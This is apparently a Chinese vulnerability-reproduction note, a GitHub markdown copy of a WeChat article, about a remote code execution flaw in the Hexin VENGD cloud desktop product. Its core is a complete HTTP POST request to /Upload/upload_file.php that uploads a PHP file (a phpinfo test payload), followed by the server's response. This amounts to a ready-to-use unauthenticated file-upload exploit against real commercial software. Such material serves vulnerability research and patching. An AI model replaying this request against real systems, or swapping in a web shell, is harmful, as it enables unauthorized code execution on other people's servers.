Skip to content

Latest commit

 

History

History
111 lines (70 loc) · 2.21 KB

和信下一代云桌面远程代码执行漏洞复现.md

File metadata and controls

111 lines (70 loc) · 2.21 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

漏洞描述

和信下一代云桌面系统(VENGD),是国内的基于 NGD(Next Generation Desktop) 架构的桌面虚拟化产品,它融合了 VDI、VOI、IDV 三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的同时更能充分利用前端资源,HVV 活动中出现此漏洞。

漏洞编号

利用类型

远程

漏洞分类

  • php

适用版本

标签

  • php

  • CMS

  • RCE

发布日期

2021.04.19

漏洞等级

高危

漏洞原理

暂无

漏洞利用

利用脚本

暂无

利用方法

POST /Upload/upload_file.php?l=test HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
Content-Length: 184

------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; 
Content-Type: image/avif

<?php phpinfo(); ?>
------WebKitFormBoundaryfcKRltGv--
HTTP/1.1 200 OK
Date: Mon, 26 Apr 2021 15:00:16 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 18
Connection: close
Content-Type: text/html; charset=UTF-8

_Requst:<br>

利用过程

参考链接